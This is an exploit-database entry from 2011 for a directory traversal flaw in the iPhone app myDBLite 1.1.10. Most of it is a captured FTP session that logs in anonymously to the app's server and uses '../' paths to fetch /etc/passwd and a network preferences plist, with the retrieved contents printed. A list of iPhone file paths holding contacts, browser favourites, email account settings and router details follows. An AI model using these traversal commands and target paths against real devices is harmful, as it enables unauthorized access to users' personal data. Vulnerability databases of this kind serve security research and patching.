Lucene search
K

iOS myDBLite 1.1.10 - Directory Traversal

🗓️ 24 Feb 2011 00:00:00Reported by R3d@l3rt_ Sp@2K_ SunlightType 
exploitpack
 exploitpack
👁 11 Views

myDBLite v1.1.10 for iPhone / iPod touch, Directory Traversal vulnerability, Exploit Testin

Code
# Exploit Title : myDBLite v1.1.10 for iPhone / iPod touch, Directory Traversal 
# Date: 02/24/2011
# Author: R3d@l3rt, Sp@2K, Sp@2K, Sunlight, H@ckk3y
# Software Link: http://itunes.apple.com/kr/app/mydb-lite/id335521112?mt=8
# Version: 1.1.10
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware  

# There is directory traversal vulnerability in the myDBLite.  
# Exploit Testing

C:\>ftp
ftp> open 192.168.0.70 29161
Connected to 192.168.0.70.
220 DiddyDJ FTP server ready.
User (192.168.0.70:(none)): anonymous
331 Password required for anonymous
Password:
230 User  logged in.
ftp> dir
200: PORT command successful.
150: Opening ASCII mode data connection for '/bin/ls'.

-rw-r--r--     1 mobile mobile        429 1??09 10:55 appConfig.plist
-rw-r--r--     1 mobile mobile        429 1??09 10:55 appConfigInit.plist
-rw-r--r--     1 mobile mobile        899 1??09 10:55 appData.plist
-rw-r--r--     1 mobile mobile        899 1??09 10:55 appDataInit.plist
-rw-r--r--     1 mobile mobile       9859 1??09 10:55 astonmartin.jpg
-rw-r--r--     1 mobile mobile         20 1??09 10:55 astonmartin.txt
-rw-r--r--     1 mobile mobile      11128 1??09 10:55 ferrari.jpg
-rw-r--r--     1 mobile mobile         74 1??09 10:55 ferrari.txt
-rw-r--r--     1 mobile mobile      32797 1??09 10:55 frey.jpg
-rw-r--r--     1 mobile mobile      17553 1??09 10:55 porsche.jpg
-rw-r--r--     1 mobile mobile        111 1??09 10:55 porsche.txt
-rw-r--r--     1 mobile mobile        422 2??24 15:20 pswd.bkup
-rw-r--r--     1 mobile mobile        422 2??24 15:21 pswd.plist
-rw-r--r--     1 mobile mobile      54378 1??09 10:55 schinznach.jpg
drwxr-xr-x    12 mobile mobile        476 1??04 14:43 secret

226 Transfer complete.
ftp: 1044 bytes received in 0.02Seconds 65.25Kbytes/sec.
ftp> cd ../../../../../../
250 CWD command successful.
ftp> dir
200: PORT command successful.
150: Opening ASCII mode data connection for '/bin/ls'.

-rwxr-xr-x    40 root admin         30 10??26 01:20 Applications
drwxrwxr-x     1 root admin         68 8??19 04:10 Developer
drwxrwxr-x    24 root admin        884 1??12 12:53 Library
drwxr-xr-x     1 root wheel        102 8??19 04:18 System
-rwxr-xr-x     7 root admin         11 2??23 19:41 User
drwxr-xr-x    59 root wheel       2074 1??13 09:52 bin
drwxr-xr-x     1 root admin         68 10??26 01:19 boot
-rw-r--r--     1 (null) (null)        638 1??25 15:30 control
drwxrwxr-x     1 root admin         68 8??03 12:41 cores
----------     1 (null) (null)          0 (null) dev
-rwxr-xr-x    25 root admin         11 8??26 05:20 etc
drwxr-xr-x     1 root admin         68 10??26 01:19 lib
drwxr-xr-x     1 root admin         68 10??26 01:19 mnt
drwxr-xr-x     2 root wheel        136 10??23 15:12 private
drwxr-xr-x    47 root wheel       1666 1??13 09:52 sbin
-rwxr-xr-x     5 root admin         15 8??26 05:20 tmp
drwxr-xr-x     9 root wheel        374 1??13 09:52 usr
-rwxr-xr-x    26 root admin         11 8??26 05:20 var

226 Transfer complete.
ftp: 1128 bytes received in 0.02Seconds 70.50Kbytes/sec.
ftp> get ../../../../../etc/passwd
200: PORT command successful.
150: Opening BINARY mode data connection for '../../../../../etc/passwd'.
226 Transfer complete.
ftp: 787 bytes received in 0.00Seconds 787000.00Kbytes/sec.
ftp> get ../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist
200: PORT command successful.
150: Opening BINARY mode data connection for '../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist'.
226 Transfer complete.
ftp: 272 bytes received in 0.00Seconds 272000.00Kbytes/sec.
ftp> quit
221- Data traffic for this session was 0 bytes in 0 files

C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX? XnatFlag
C:\>



# IPhone inside information

1. Phone Book
 - /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
     
2. Safari Favorites List
 - /private/var/mobile/Library/Safari

3. Users E-mail Information
 - /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist

4. IPv4 Router Information
 - /private/var/mobile/Library/Preferences/com.apple.conference.plist

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation